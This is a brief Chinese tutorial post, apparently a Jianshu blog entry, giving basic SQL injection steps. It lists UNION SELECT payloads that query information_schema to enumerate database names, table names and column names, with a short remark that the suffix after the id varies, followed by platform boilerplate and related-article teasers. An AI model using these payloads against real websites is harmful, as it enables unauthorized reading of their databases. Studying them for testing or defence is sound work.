sql注入基本操作

id后的符號(hào)視情況而定

爆數(shù)據(jù)庫(kù)

?union select 1,group_concat(schema_name),3 from information_schema.schemata--+

union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

爆數(shù)據(jù)表

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=' '--+

爆數(shù)據(jù)表的列

union select 1,group_concat(column_name),3 from information_schema.columns where table_name=' '--+

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • Sql注入定義: 就是通過(guò)把sql命令插入到web表單提交或輸入域名或頁(yè)面請(qǐng)求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行...
    付出從未后悔閱讀 751評(píng)論 0 3
  • web應(yīng)用程序會(huì)對(duì)用戶的輸入進(jìn)行驗(yàn)證,過(guò)濾其中的一些關(guān)鍵字,這種過(guò)濾我們可以試著用下面的方法避開。 1、 不使用被...
    查無(wú)此人asdasd閱讀 7,656評(píng)論 0 5
  • MSSQL 跨庫(kù)查詢(臭要飯的!黑夜) 榨干MS SQL最后一滴血 SQL語(yǔ)句參考及記錄集對(duì)象詳解 關(guān)于SQL S...
    碧海生曲閱讀 5,885評(píng)論 0 1
  • 注: 以下payload均基于單引號(hào)字符型注入。若是整型注入,需將單引號(hào)與后面的注釋符(--+)都去掉;若是雙引號(hào)...
    就是愛文藝閱讀 6,384評(píng)論 1 4
  • 與過(guò)去的那個(gè)自己說(shuō)再見,不要輕易說(shuō)“我就是這樣做事的”或者“我就是這樣的性格”……相反的是,我們可以不設(shè)限地去嘗試...
    小慕雅的牧屋閱讀 1,081評(píng)論 1 6

友情鏈接更多精彩內(nèi)容